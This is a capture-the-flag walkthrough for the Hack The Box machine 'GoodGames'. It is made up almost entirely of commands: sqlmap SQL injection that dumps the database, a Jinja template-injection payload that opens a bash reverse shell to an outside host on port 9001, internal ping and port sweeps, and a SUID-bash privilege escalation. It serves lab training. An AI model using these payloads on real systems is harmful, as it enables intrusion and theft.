Explore the fundamentals of cybersecurity in the GoodGames Capture The Flag (CTF) challenge, a easy-level experience! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it accessible for players at this level.

Add Hosts#

10.10.11.130 goodgames.htb internal-administration.goodgames.htb

Script to add hosts automatically#

ip="10.10.11.130"
domain="goodgames.htb internal-administration.goodgames.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts

Mapping#

nmap -sCV goodgames.htb

Nmap scan report for goodgames.htb (10.10.11.130)
Host is up (0.053s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
80/tcp open  http    Werkzeug httpd 2.0.2 (Python 3.9.2)
|_http-title: GoodGames | Community and Store
|_http-server-header: Werkzeug/2.0.2 Python/3.9.2

Exploiting GoodGames HTB#

  1. Register on http://goodgames.htb/signup.

  2. Intercept the login request and begin testing for SQL injection with sqlmap.

sqlmap -u "http://goodgames.htb/login" \
  --data="email=1&password=a@a.com" \
  --user-agent="Mozilla/5.0 (X11; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0" \
  --referer="http://goodgames.htb/signup" \
  -p email --batch --dbms="MySQL" --level=5 --risk=3 --threads 10
  1. List databases with SQLMap:
sqlmap -u "http://goodgames.htb/login" \
  --data="email=1&password=a@a.com" \
  --user-agent="Mozilla/5.0 (X11; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0" \
  --referer="http://goodgames.htb/signup" \
  -p email --batch --dbms="MySQL" --level=5 --risk=3 --threads 10 --dbs
  1. Dump the main database:
sqlmap -u "http://goodgames.htb/login" \
  --data="email=1&password=a@a.com" \
  --user-agent="Mozilla/5.0 (X11; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0" \
  --referer="http://goodgames.htb/signup" \
  -p email --batch --dbms="MySQL" --level=5 --risk=3 --threads 10 -D main --dump

Searching the Hash#

  • Search for the hash 2b22337f218b2d82dfc3b6f77e7cb8ec on Google, which reveals the password.

Logging into Internal Admin Panel#

  1. Log in to http://internal-administration.goodgames.htb/login.

    Credentials:

    • admin:superadministrator

  2. The interesting page is http://internal-administration.goodgames.htb/settings.

Exploit SSTI for Reverse Shell#

  1. Change the username, capture the request, and modify it to execute the reverse shell:
{{ namespace.__init__.__globals__.os.popen('bash+-c+"bash+-i+>%26+/dev/tcp/10.10.14.10/9001+0>%261"').read() }}
  1. Upgrade to a better shell using the following method:
script /dev/null -c bash
  1. Send the shell to the foreground:

Press Ctrl + Z to background the shell, then run:

stty raw -echo; fg

Gaining Access#

  1. Access user.txt:
cat /home/augustus/user.txt
  1. Copy bash to your home directory:
cp /bin/bash /home/augustus
  1. Check if you’re inside a Docker container by looking for .dockerenv:
ls -a /

Network Exploration#

  1. Ping sweep to find hosts:
for i in {1..254}; do (ping -c 1 172.19.0.${i} | grep "bytes from" | grep -v "Unreachable" &); done;
  1. Check for open ports on the discovered host (example 172.19.0.1):
for port in {1..65535}; do echo > /dev/tcp/172.19.0.1/$port && echo "$port open"; done 2>/dev/null
  1. SSH into the discovered host:
ssh augustus@172.19.0.1 
cp /bin/bash /home/augustus
exit

Privilege Escalation#

  1. Change permissions for bash to allow root execution:
chown root:root /home/augustus/bash 
chmod 4777 /home/augustus/bash
  1. Log in again via SSH:
ssh augustus@172.19.0.1
  1. Execute bash with preserved privileges:
./bash -p
  1. Read root.txt:
cat /root/root.txt